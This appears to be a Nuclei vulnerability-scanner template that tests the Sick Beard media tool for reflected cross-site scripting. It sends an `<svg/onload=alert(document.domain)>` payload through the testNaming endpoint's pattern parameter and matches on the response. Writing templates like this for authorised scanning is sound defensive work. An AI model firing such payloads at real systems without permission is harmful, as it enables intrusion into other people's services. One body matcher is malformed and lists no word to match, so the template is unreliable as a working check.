id: sick-beard-xss # Vendor Homepage: https://sickbeard.com/ # Software Link: https://github.com/midgetspy/Sick-Beard # shodan dork: sickbeard info: name: Sick Beard XSS author: pikpikcu severity: medium requests: - method: GET path: - "{{BaseURL}}/config/postProcessing/testNaming?pattern=%3Csvg/onload=alert(document.domain)%3E" matchers-condition: and matchers: - type: status status: - 200 - type: word words: - part: body - type: word words: - "text/html" part: header